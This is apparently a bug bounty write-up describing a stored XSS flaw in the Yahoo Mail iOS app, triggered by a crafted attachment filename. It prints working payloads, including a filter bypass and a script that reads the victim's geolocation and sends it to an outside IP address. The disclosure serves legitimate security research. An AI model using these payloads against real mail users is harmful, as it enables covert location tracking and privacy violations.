Stored XSS in Yahoo mail IOS app($3500)

kminthein
kminthein
May 28, 2020 · 2 min read

Copy from one of my 2018 blog post.

Intro

I want to share about my easy finding in Yahoo mail IOS application, easy but worth $3500.

Last 3 months ago, i found Stored XSS in Microsoft outlook mail IOS app. You can read there. So, I think “what if yahoo is vulnerable to this kind of attack? “, then i start testing on yahoo mail app. Using the same payload, the same filename with

“><img src=x onerror=alert(1)>.jpg
But, yahoo mail app didn’t pop-up, so i start digging around and change payload name to “><plaintext>. Then, finally i know there has some restrictions so i didn’t see an alert.

All complex payload didn’t find a right solution and pentesting on IOS mail app is harder than web application. After searching around 1 hours, i found the right solution. With “><img src=x onerror=”a=alert;a(1);”.jpg can bypass this restriction.

Then i knew, the right solution. I need to pop-up something useful but in IOS app, you can’t use document.domain, document.cookies, so i used

'"><img src="x" onerror="v=prompt;navigator.geolocation.watchPosition(function(loc){m='Location latitiude'+loc.coords.latitude+'long titue'+loc.coords.longitude;v(m);b=document.createElement('img');b.src='http/104.131.35.19?c='+m;})">

payload to steal victims location. After uploading this payload and sent to victims email. If victims open this email. I will exactly knows his geolocation.

I reported to Yahoo, and Yahoo gave me an initial reward $300 and final payout is $3200. So, total $3500. Easy money right? 😀

Thats all, sometimes you don’t need a lots of recon and skills. If you can find a right path and a right solution, you can get some money.

Btw, this is not one of my current findings, I just want to reunite all of my separate blogs.

qwerty

secblog